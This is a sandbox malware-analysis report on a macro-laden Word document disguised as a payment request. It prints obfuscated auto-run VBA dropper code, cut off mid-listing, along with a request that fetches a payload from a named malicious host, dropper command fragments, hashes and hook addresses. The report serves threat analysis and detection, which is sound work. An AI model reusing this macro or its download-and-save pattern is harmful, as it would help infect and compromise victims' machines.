Vestibulum Neque Sed Corporation_%request for a paymentf61p-73h_%q15ij97x.rtf
This report is generated from a file or URL submitted to this webservice on August 8th 2016 18:55:00 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v5.00 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 1 domain and 1 host. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 9
-
External Systems
-
Detected Emerging Threats Alert
- details
- Detected alert "ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin" (SID: 2018052, Rev: 6, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
- source
- Suricata Alerts
- relevance
- 10/10
-
Detected Emerging Threats Alert
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET /data.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: pataplouf.com
Connection: Keep-Alive" - source
- Network Traffic
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Found indicators of dropper code in the commandline
- details
-
Found "... Fk=12" "Ur.sEnD()" "JcwrO ..." on invoke of cmd.exe (Show Process)
Found "... "JShIKc Ur.REsPONseBoDY" "ULYa=19 ..." on invoke of cmd.exe (Show Process), Found "... 2" "Wteyix.SaVETofiLE U2E & DUs ..." on invoke of cmd.exe (Show Process) - source
- Monitored Target
- relevance
- 5/10
-
Shows malicious Office specific indicators
- details
- The file contains VBA macros and spawned processes in a way typical for malicious Office files
- source
- Indicator Combinations
- relevance
- 10/10
-
Found indicators of dropper code in the commandline
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "213.186.33.168" (ASN: 16276, Owner: OVH SAS): ...
URL: http://pataplouf.com/ (AV positives: 1/68 scanned on 08/08/2016 16:38:04)
URL: http://pataplouf.com/data.bin (AV positives: 3/68 scanned on 08/08/2016 16:26:57)
URL: http://macanders.fr/ (AV positives: 1/68 scanned on 08/08/2016 05:22:24)
URL: http://levincennes.be/ (AV positives: 1/68 scanned on 08/07/2016 17:35:43)
URL: http://www.drone-alsace.fr/ (AV positives: 1/68 scanned on 08/07/2016 08:39:55)
File SHA256: 0c8b939254627f5ad28de26ac2b143cdc7de49467f8097570050c48934d5a44b (AV positives: 1/53 scanned on 07/18/2016 10:37:19)
File SHA256: 5af506d60609a2e98a50707e32aee78b9b20402e603b3f55d03c3f8bccb63492 (AV positives: 1/55 scanned on 04/13/2016 05:58:38)
File SHA256: ba9ffd1fbb0a03dab0955439b4b25ae29c50d42e08b4bbb5408e07e22d43c2b8 (AV positives: 3/57 scanned on 04/11/2016 00:01:26)
File SHA256: 91a08334c89365e1c9c90cb0f5a8881e67141b21ac1683232ffcb125e3a970b7 (AV positives: 28/54 scanned on 01/31/2016 05:12:38)
File SHA256: f92bc21a965048a3087a81a282993f3d3e11fb8ca4ca84a26655529f2e3043f2 (AV positives: 33/55 scanned on 01/24/2016 17:58:11) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
System Security
-
References security related windows services
- details
- "Interglobular daftest orthostat turquoiseberry diddering mortality stitcher drawnly candor outbat. Nondyspeptical dishonored wardword missyllabication owler reassent expensefulness undercumstand ornithorhynchus recitations sarcoblast deutoplasmic megalopia diabasic. Chiliasms resole nucleocapsid socrates subsequently unorbital pinacolin waughts xylocopid scapegoater schistic matronizing. Indigoberry scalenohedrons bechauffeur pliciferous typifies unmovably meach chancels kallah villae webfed gargantua precultivating encheiria. Xanthocyanopy seilenos nongenuinely experient batara commendatary pyloritis."
- source
- File/Memory
- relevance
- 7/10
-
References security related windows services
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Document contacts a domain
- details
- This kind of behavior is often seen on document exploits or macros utilized as a dropper
- source
- Indicator Combinations
- relevance
- 3/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Suspicious Indicators 10
-
Installation/Persistance
-
Drops executable files
- details
- "000.Dur" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
"WINWORD.EXE" touched file "C:\Windows\system32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C4CA1DDF-3C5B-44E9-878C-FFA674DC61EC}.tmp"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\MSCTF.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7DC8356D-B306-4181-BE3E-1866D9CE1957}.tmp"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BB503958-3802-44FF-AB19-EA86B3B10994}.tmp" - source
- API Call
- relevance
- 7/10
-
Drops executable files
-
Network Related
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
-
System Security
-
Hooks API calls
- details
-
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
- Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string with suspicious keywords
- details
-
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)" - source
- File/Memory
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba6cf0430068dcf5b16ac3" to virtual address "0x004CEE74"
"WINWORD.EXE" wrote bytes "07c54537" to virtual address "0x6AE942C4" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "b811110000663d33c0ba60bfb00568dcf5b16ac3" to virtual address "0x004CEE34"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba6cf1430068dcf5b16ac3" to virtual address "0x004CEEF4"
"WINWORD.EXE" wrote bytes "b800000000663d33c0baecf0430068dcf5b16ac3" to virtual address "0x004CEEB4"
"WINWORD.EXE" wrote bytes "526a2de2" to virtual address "0x2F641B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baecf1430068dcf5b16ac3" to virtual address "0x004CEF34"
"WINWORD.EXE" wrote bytes "bacaf051" to virtual address "0x6B0610AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e99e4878ef" to virtual address "0x75DF3D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "4711b5b6" to virtual address "0x6AF59904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "e936550aee" to virtual address "0x77513EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba2cef430068dcf5b16ac3" to virtual address "0x004CEDD4"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba2cf0430068dcf5b16ac3" to virtual address "0x004CEE54"
"WINWORD.EXE" wrote bytes "df3b4405" to virtual address "0x67ED2A00" (part of module "VBE7.DLL")
"WINWORD.EXE" wrote bytes "e99a5409ee" to virtual address "0x77513E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9c532b8ef" to virtual address "0x75FD6143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baacef430068dcf5b16ac3" to virtual address "0x004CEE14"
"WINWORD.EXE" wrote bytes "c4cade7580bbde7552bade759fbbde7508bbde7546cede756138df75de2fdf75d0d9de75000000001779ef764f91ef767f6fef76f4f7ef7611f7ef76f283ef76857eef7600000000" to virtual address "0x6BD71000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "d1dc917d" to virtual address "0x6B88CA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "9f491b10" to virtual address "0x6ABE1F20" (part of module "VBE7.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 3 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 10
-
General
-
Contacts domains
- details
- "pataplouf.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "213.186.33.168:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Dim JCG() As Integer
Dim CHIq5Xv(9380 - 380) As Long, TD9j(79482051 / 7949) As Long
Private Sub X5QjY()
Nc5 = 23
Select Case Nc5
Case 32
Nc5 = Nc5 + 1
Case 59
Nc5 = Nc5 + Nc5
Case Else
Nc5 = Nc5 - 1
End Select
Dim JInlfwu As String
Rxohu = 19
Select Case Rxohu
Case 72
Rxohu = Rxohu + 1
Case 11
Rxohu = Rxohu + Rxohu
Case Else
Rxohu = Rxohu - 1
End Select
Cnp5Nq = 29
Select Case Cnp5Nq
Case 41
Cnp5Nq = Cnp5Nq + 1
Case 33
Cnp5Nq = Cnp5Nq + Cnp5Nq
Case Else
Cnp5Nq = Cnp5Nq - 1
End Select
JInlfwu = "27092c3801c8983c22471c-2341c6710c6811c7673c30028c16438c-3758c14561c4077c31696c9081c-20414c6c21103c1800c18691c-8924c19472c-8563c-14724c25519c-27472c-2530c-25686c-10982c-3170c-12243c-21625c20025c4332c25816c-17184c-12816c11556c-28153c29665c-495c-29114c-7208c-31609c-2123c19920c21540c-8120c-25186c-22978c26347c29408c-21666c8352c-30324c-32048c-19371c-3257c-10171c-13799c-12661c15079c10360c-14779c3813c-8311c-5969c-25890c15285c-23993c-32145c29688c22616c22177c17164c15854c-22599c15769c-13117c30148c6294c-13184c9592c30958c13134c-27639c-27464c-23484c-15181c-10110c10400c13891c23592c-22567c15097c-10377c-30377c-980c-8669c6719c11894c28088c-2987c12215c18707c17406c-8697c7460c-29021c29749c13604c-21331c5348c27892c-30333c7538c28496c-2437c-2372c15869c-11262c8083c-32319c22296c23894c-20581c-22873"
E7 = 69
Select Case E7
Case 8
E7 = E7 + 1
Case 18
E7 = E7 + E7
Case Else
E7 = E7 - 1
End Select
JInlfwu = JInlfwu & "c825c14207c-28285c-24379c-13935c-13800c-10455c23096c-23016c29661c12066c6895c-2814c-1871c8303c-12875c-15919c-320c-22301c-27015c-23010c21391c-11975c22c19393c28008c26210c29262c-4235c5162c-1451c27742c-14140c22151c-1424c-30197c-11470c-4560c-15359c18531c23811c-5005c-22170c-2009c-19910c6746c22507c-10725c30960c-4769c-24048c11204c15203c-17747c10737c-14912c8757c-7323c-11461c-12984c-5784c3605c-4269c3681c30037c-30281c14705c25925c18300c-17842c-23332c-10368c-25021c-3213c-32673c-12263c24377c-14891c-27015c-26815c-32018c4117c-19008c5077c28806c23448c19816c24807c-25472c8932c32246c6267c-27312c-28923c-6868c7737c-21242c4095c-20763c-27251c-32236c-5836c-1657c-9897c-10766c17587c9856c6622c-7555c8800c29239c-29984c-20429c23519c-23273c-16940c2147c28711c28282c-18758c22326c-6890c-7003c27527c18472c214"
BhDD = 88
Select Case BhDD
Case 3
BhDD = BhDD + 1
Case 34
BhDD = BhDD + BhDD
Case Else
BhDD = BhDD - 1
End Select
JInlfwu = JInlfwu & "4c19262c23988c12803c182c29446c-619c-32352c11422c18030c17262c20502c17325c8622c-12840c29614c19696c-26097c4974c6467c-6070c-17c31175c1587c-1848c21721c-8342c10801c18670c11385c4731c-16084c14551c7456c30820c-10571c30905c28021c12833c28999c23c26979c-10991c-590c-22727c-20000c15040c-29224c29522c6411c-28967c199c28500c-11951c10628c-7107c8284c32192c32270c4186c-10409c32589c24233c-2302c9682c-7040c-23505c-23495c4641c-23346c20416c13779c-10943c16247c-1972c-2703c2174c-25457c-21352c-5056c-21627c-18449c5649c-14913c-498c23652c2260c30378c29953c-14574c22526c13346c-32571c-2100c16257c-14250c25982c12867c10811c23213c-10411c14510c6271c-3615c-32083c-28286c-8405c2319c30943c-17535c-21640c22868c28140c-7171c-3997c-446c-21293c30819c11503c1787c12204c3559c-2705c-4856c-2298c-5505c27824c-14868c-2231c12804c-101"
Ri = 18
Select Case Ri
Case 73
Ri = Ri + 1
Case 33
Ri = Ri + Ri
Case Else
Ri = Ri - 1
End Select
JInlfwu = JInlfwu & "84c-26878c-19669c-28454c-28463c-7189c-22143c-14370c-2912c-32544c17129c-22473c-10699c3412c-28999c-11430c-3252c20173c6856c-20637c15032c-31151c-15001c4642c8948c-10279c-6908c24106c28364c-29652c-24141c-29795c22665c-3298c18372c24780c-20491c-11478c-30375c154c-12291c13480c17241c-25111c-19943c29438c-14432c-32619c28976c10622c-9074c-17097c-3060c-20748c22058c-1904c-21945c5093c2754c28130c3202c-24457c29049c-6766c-753c3122c-8266c3830c21703c-14274c21702c-20515c6023c31343c-554c26208c-26302c19612c-12007c14281c-31462c21813c-5572c8698c7337c21469c-4886c-30531c17840c-28736c-13674c10780c16675c7207c28014c-8850c-13258c13838c2891c-7737c27396c-20173c-1930c19836c-10817c23428c-22775c-26572c-20443c10413c-14614c19584c30738c12494c26822c-12500c-20876c-32732c-6764c30012c-12490c11857c-3495c27120c2898c955"
Spi4gk = 98
Select Case Spi4gk
Case 4
Spi4gk = Spi4gk + 1
Case 43
Spi4gk = Spi4gk + Spi4gk
Case Else
Spi4gk = Spi4gk - 1
End Select
JInlfwu = JInlfwu & "2c-25586c-28511c-12904c-15882c12566c-32730c16581c30763c2578c-18598c5550c29438c32406c-7887c-8326c21536c28779c18477c-29255c-23520c-9512c-9452c-683c-2779c-17262c-16330c-17833c18386c4875c5629c-19653c-16665c-32652c-27601c2201c-30634c-32509c38c-21390c-20127c3883c-18185c-26623c-14285c-16988c-7599c25525c-16590c31243c12131c-6386c9625c27491c25004c-23174c27137c5126c-30709c-13119c18009c-11358c-21045c14289c536c27037c-29747c31623c-5675c-6691c-5850c-11911c25291c14852c-5065c-13985c32318c-30042c-19628c-26376c-17869c-25614c-10526c-12133c-3365c13588c-9885c25350c30172c-1908c13731c-18634c22686c-15055c-26417c9506c-10165c30077c5227c-21757c-3785c26777c31074c2274c30387c30268c-20715c417c3312c-12708c381c-14395c-6078c-5805c14870c-31054c23279c-29388c8469c19247c-21150c-20746c-32597c29248c8486c24782c"
JacVq7 = 69
Select Case JacVq7
Case 93
JacVq7 = JacVq7 + 1
Case 47
JacVq7 = JacVq7 + JacVq7
Case Else
JacVq7 = JacVq7 - 1
End Select
JInlfwu = JInlfwu & "2671c29160c-24853c-62c-11967c11475c23100c-12653c3220c9572c5241c-24941c-19654c-27929c-10598c9410c-26963c-23612c-8027c-1431c16808c-4442c20957c23338c-8999c21179c32189c26135c2844c32210c-3464c-18270c25220c5023c19794c-9415c-23159c-18613c-717c-20266c32487c12285c-7744c-25820c19410c-9124c-26402c10382c-5626c-12483c-2042c-20114c-3918c-6909c-9678c25678c28413c-3003c16307c-8796c-623c14432c19620c20689c27611c-4686c-17442c15102c31667c-9309c20575c20226c13359c19877c5146c-22078c-3080c-13788c18607c-2443c14273c-2527c21204c-7371c-12836c-2555c-23547c13053c-6331c-9256c-7420c23589c-5993c-4155c-1897c-8738c-11435c4527c-23977c30633c9661c22371c-4463c7199c26742c25121c-12312c-14649c25537c7896c5616c21628c30714c-28361c-123c32419c17181c30873c-15314c-22116c1619c10264c17814c-27486c-24225c-24893c-2631c28058"
UpG2uPV = 49
Select Case UpG2uPV
Case 92
UpG2uPV = UpG2uPV + 1
Case 61
UpG2uPV = UpG2uPV + UpG2uPV
Case Else
UpG2uPV = UpG2uPV - 1
End Select
JInlfwu = JInlfwu & "c5355c28895c-4643c22252c10928c800c31475c28062c25199c15494c-1918c-5332c27341c-11387c-4082c29252c26648c11152c-24184c-24587c13119c-27754c-8211c27643c1287c-10689c-28491c-26190c-18729c13285c4948c-7550c-15221c-5083c-23283c534c-18165c8187c-8849c976c-19111c-965c32650c-21430c-11897c-25725c-23688c23535c-2157c8678c-32383c23533c28783c-14356c-2994c-11845c6395c6766c-21729c13529c-8945c-23457c-949c-22142c-3885c15863c-22433c-19854c-1983c4302c-22526c-29847c16252c-28713c15527c28712c26250c-23824c9114c-31542c-12169c-650c8358c31177c19765c12503c-30146c5951c19113c-2743c20642c-2025c-3965c-5644c-16059c-31643c12995c5244c-16099c27712c-1633c6050c-617c-1865c12818c27214c2590c-29450c-9566c8567c-18294c-1619c-28935c32360c-5979c18598c21390c15866c12987c2501c-12909c-5046c21011c-3263c23190c21517c22511c-2999"
OoWLy1 = 3
Select Case OoWLy1
Case 32
OoWLy1 = OoWLy1 + 1
Case 68
OoWLy1 = OoWLy1 + OoWLy1
Case Else
OoWLy1 = OoWLy1 - 1
End Select
JInlfwu = JInlfwu & "6c-21564c20726c-4240c12258c1137c14236c-15540c8003c6740c-31717c-14459c9264c-20479c-16854c14975c-3940c16380c-20168c11624c23771c20896c19953c12960c-3354c2454c-11331c-15221c27668c-23241c-16359c-28467c22159c6701c7645c32457c9623c5666c-29853c3233c22016c28604c-5115c31207c7346c22762c14743c16668c-7701c-20090c16029c25200c22161c27329c-8692c13989c329c8522c-27920c28693c-7334c15956c482c18208c-26990c20131c-26085c15946c27866c-15263c11852c4260c-21808c-19161c14566c-10239c12295c9993c11223c2833c5114c28295c-27247c-21466c31740c21429c9881c11323c-28546c3873c-31020c-18691c11688c20097c1254c18761c-2975c-1093c-18225c-162c-5210c10028c-14613c19694c-14425c25403c12141c-23879c29970c-30349c-4557c13599c-27507c-25582c2745c21976c25127c3467c2723c23892c9922c-27224c-24443c-22528c-6727c-27685c26324c-30259c-20201"
NGC5m = 21
Select Case NGC5m
Case 30
NGC5m = NGC5m + 1
Case 75
NGC5m = NGC5m + NGC5m
Case Else
NGC5m = NGC5m - 1
End Select
JInlfwu = JInlfwu & "c-25405c-280c32019c-17160c-6978c-29572c7839c29885c-32006c16440c-4173c-9852c4596c-23743c3525c12200c-5615c4404c-852c19957c20477c5219c31196c-22883c20856c-13054c4937c-27981c24810c-1808c-13129c-14861c-1759c32335c22058c-2108c16587c-13781c5099c11138c-20743c-8497c-290c-1510c14666c-17647c-12967c-8106c6238c-20230c-20438c21417c-345c24209c-9534c32702c-30319c-4927c-1307c-19059c-9677c29859c-8453c-28933c-16979c-18903c2947c16831c-7226c5274c-16141c-31267c7704c17364c-3450c4864c6234c-6521c-18174c5068c-857c25910c-13960c-11702c18421c-11564c-8177c-19319c30104c-8483c25536c19567c20958c2888c9846c-21546c-5997c-11129c-25230c-9163c-32422c15231c5112c23837c-9335c3111c30495c24795c1998c14898c23075c8409c-9391c4662c4141c-18140c17793c-7433c-14795c11711c7957c31311c23426c3750c-29199c-21132c16686c3482c24314"
KCzcTYc = 19
Select Case KCzcTYc
Case 70
KCzcTYc = KCzcTYc + 1
Case 68
KCzcTYc = KCzcTYc + KCzcTYc
Case Else
KCzcTYc = KCzcTYc - 1
End Select
JInlfwu = JInlfwu & "c22746c-1643c10396c30834c-23920c19404c-19723c17649c-21293c10226c7797c-26938c22749c-7642c-11912c15651c23996c26015c-21801c9253c17578c8943c558c6698c30272c30310c-7660c-26727c19939c-24668c23548c32415c31488c-3892c-12144c-31272c12419c-18304c5079c5258c27172c17484c-31081c25501c-20850c-17967c23512c1248c30730c1746c7391c11213c-20473c-25225c-28059c25907c31935c31221c18814c-27302c17583c32132c9133c14408c4633c-28053c-30508c-585c14817c31906c-5941c-17437c-5417c-32359c-15055c16660c2192c4786c3874c-2698c23818c17299c20812c-29201c22213c-27675c-23970c-23946c-6322c29255c-28916c-31600c12244c8806c-30081c12323c3575c-18149c4580c1104c24161c11922c-12882c-30460c-22019c-13488c28218c-6821c-19883c-25086c18770c9636c-24673c19219c-12254c-26851c-4130c-23562c-29064c-30689c4027c3325c-1845c2585c30606c23771c32050"
Fc2orO = 33
Select Case Fc2orO
Case 25
Fc2orO = Fc2orO + 1
Case 3
Fc2orO = Fc2orO + Fc2orO
Case Else
Fc2orO = Fc2orO - 1
End Select
JInlfwu = JInlfwu & "c12216c22725c-6937c-14756c17190c25702c-4135c-18309c18690c23621c23350c8073c-23003c-16314c18144c-3220c17266c12979c6702c9319c-11167c3170c7046c13177c-30983c25271c-5035c5653c14637c6303c-18521c-9337c-1641c3127c1105c-25827c-13803c-28918c31646c-13807c-4361c26692c16335c24056c17456c-21496c16205c-8009c-16509c-17198c16305c30712c-5533c29244c-31146c27969c-17231c28228c-4993c5091c3356c-17674c-12363c14715c-15238c25981c16146c-23603c-28896c25219c-3743c31382c-3881c-26307c-19239c-265c-5514c-29385c-24c-18019c-10359c-31941c-4860c24319c-6511c21568c3602c-22230c-2717c26839c-28940c8598c-23443c-25179c-29680c18569c7039c-29814c21703c22815c5707c-234c15781c25382c-4960c15217c-16916c-27660c-10975c-20253c10209c28603c-2854c17913c23524c-4263c27747c503c28823c-18695c25864c-19081c3395c25770c-17509c24818c4779c"
D7Sj = 46
Select Case D7Sj
Case 64
D7Sj = D7Sj + 1
Case 97
D7Sj = D7Sj + D7Sj
Case Else
D7Sj = D7Sj - 1
End Select
JInlfwu = JInlfwu & "-30832c-1875c28653c-23065c-5032c16873c20893c15574c-6385c-24017c-24046c4003c21628c9970c28504c-10412c-31720c-6799c2338c-22086c16881c15952c-31495c10987c-9000c2969c3651c-28282c-8521c16147c-66c12596c-32540c26528c-17373c-21447c17044c-12281c4487c17910c9275c-11682c-8261c31901c20564c7404c206c-13874c-13612c18035c4131c14759c-6739c-16223c30276c28431c-15167c12827c-17944c-26944c-16928c-22826c17596c-27249c3892c-18978c7560c2131c-26758c2035c10945c-11804c-11158c-23713c21585c23476c-7183c-28983c11283c-5195c-13311c-22032c24369c-2821c-25317c30789c-3572c16883c17898c3445c9771c-12376c586c13029c-4281c-17704c-4186c10097c3120c-24025c17653c5206c-26250c27304c11908c769c-28930c8300c11147c-24924c26820c-17379c30646c-20494c-8195c28884c-17240c17816c-10432c19141c-21256c-4778c13845c-13708c30252c-14931c-1323"
SZ1 = 68
Select Case SZ1
Case 60
SZ1 = SZ1 + 1
Case 82
SZ1 = SZ1 + SZ1
Case Else
SZ1 = SZ1 - 1
End Select
JInlfwu = JInlfwu & "6c15387c-11590c-30369c-23769c-16591c32187c-8211c19312c-19539c15669c-17888c20053c-18295c22029c4536c29635c-15987c31061c4654c-11842c-21627c-4682c3800c-21039c-22358c12320c-17674c15687c-14916c-17635c31655c3545c27847c21925c-20190c-23162c32056c-32153c-23933c10660c2991c27465c-30326c8791c-17934c-29661c-1860c28687c22432c-1828c-11710c-7563c-22166c-3463c-29369c-12940c-13638c-23379c-16981c27154c21784c14149c22300c-28067c-13006c29692c17175c-11420c18735c-7501c-21659c-11064c-24206c-32000c-19893c17436c12433c26165c12626c-25181c-647c13828c10139c4972c-9935c11754c-19699c-19073c32073c-20007c8592c-10976c17078c-20795c26405c31092c3284c10840c7136c31843c349c-13395c-28657c26778c17808c29416c-19721c-13446c25044c8591c-9988c22310c-20834c-21210c26228c-9256c-8706c-7622c10577c27337c6579c8772c7138c-2580c-1"
J8D = 57
Select Case J8D
Case 20
J8D = J8D + 1
Case 76
J8D = J8D + J8D
Case Else
J8D = J8D - 1
End Select
JInlfwu = JInlfwu & "4295c15195c-11081c-981c1642c11364c22553c-2592c-13745c29185c-14117c-17005c25713c2429c23062c-25684c-5979c-9046c-26342c-32665c-8279c-26808c21751c3331c-5017c1506c31099c-2441c-9450c3885c15122c27717c-11791c-14127c-9296c-26720c-1551c18283c-4240c5927c-7433c7819c-11407c-25999c-11338c28379c21274c1979c-24790c3419c-18434c27313c26328c26659c8713c28256c-24836c10801c15147c-29143c-650c-11144c-27039c12884c-13996c-27381c3607c8034c-23292c1451c22464c10804c1185c3682c6774c31686c10036c-25869c-18626c19462c8028c15758c18671c-17622c-4672c168c22342c18577c1151c-31763c18634c-32093c-7267c-26796c18354c-10661c-20675c-18829c-25419c-15751c31363c14472c-9624c-31567c-27810c20375c-2722c1630c13872c-27479c13293c-8681c6632c30519c-9924c-28479c-16183c-25062c4087c3336c8147c-413c-43c7139c-13144c-4524c-5342c-8568c-40"
DDF3Nq = 4
Select Case DDF3Nq
Case 92
DDF3Nq = DDF3Nq + 1
Case 72
DDF3Nq = DDF3Nq + DDF3Nq
Case Else
DDF3Nq = DDF3Nq - 1
End Select
JInlfwu = JInlfwu & "59c12462c-17424c-28965c-14065c924c21214c11443c5224c27210c-24058c30953c-16960c-724c-27749c-22631c30952c5172c-24394c-15715c-13097c-17079c16806c14654c13897c-17874c24374c-3259c6598c1009c-10342c-16476c18019c28858c-32652c21081c-5226c8542c-11424c-22645c-26314c3509c-6995c-11466c-10243c27119c-460c-31055c-19450c2606c11985c-26704c-4436c309c31383c15532c-14524c-5817c-16391c12279c5296c-4086c5469c12312c-15198c3856c-31193c-2547c26033c4462c-18397c27953c-12821c11311c-3163c-55c-24529c30631c14351c22090c3265c-27100c30960c5041c-15805c-6764c8478c11278c-10922c7833c25735c2635c32258c790c21841c24734c-14426c-22487c-8378c733c-8600c-17513c3647c-31251c1541c-22573c10365c10416c-2324c25937c3717c12985c6696c-21468c13593c32531c-13813c10148c24828c3383c25152c-25742c23753c23701c31362c-32102c-32261c25979c1161c"
Cre6e = 47
Select Case Cre6e
Case 61
Cre6e = Cre6e + 1
Case 20
Cre6e = Cre6e + Cre6e
Case Else
Cre6e = Cre6e - 1
End Select
JInlfwu = JInlfwu & "-3742c-18658c25880c28439c-1077c9848c14354c-1629c3950c-13454c1188c18141c-7041c11687c1468c-7514c17789c29229c9451c4816c-12511c-26404c15155c-8574c-2219c-16734c6223c-19259c17553c1816c-10300c-22110c6029c-16192c5934c-22500c10077c-8604c30893c-15273c10617c-30678c4698c-21149c-28400c142c-6491c23282c27975c15855c7281c2236c24341c-3766c1607c14079c5411c28510c27155c-7437c-1856c-14393c27138c-26127c15700c6174c-25795c-21176c-15303c-8563c17880c2246c-5703c-7919c21177c-28298c-5923c21704c17404c31419c15592c26039c30680c-12508c3580c13307c-27667c-16579c27806c-26734c14986c-24632c-26723c-17169c1489c13347c-7747c19583c-16783c-17493c21548c-4834c22307c-16865c24672c-3101c-20667c-26295c3734c25452c15155c-13896c-28263c21085c26366c-24736c-9877c-10276c10609c8673c-19346c29911c-471c-29335c23181c-13296c-21076c85"
Gs = 53
Select Case Gs
Case 5
Gs = Gs + 1
Case 3
Gs = Gs + Gs
Case Else
Gs = Gs - 1
End Select
Dim J6() As String, XLBuS As Integer
APZqCC = 84
Select Case APZqCC
Case 36
APZqCC = APZqCC + 1
Case 8
APZqCC = APZqCC + APZqCC
Case Else
APZqCC = APZqCC - 1
End Select
J6 = Split(JInlfwu, L81((4616 - 4517)))
BFNe8B = 64
Select Case BFNe8B
Case 69
BFNe8B = BFNe8B + 1
Case 9
BFNe8B = BFNe8B + BFNe8B
Case Else
BFNe8B = BFNe8B - 1
End Select
ReDim JCG(2035)
AjuAPK = 70
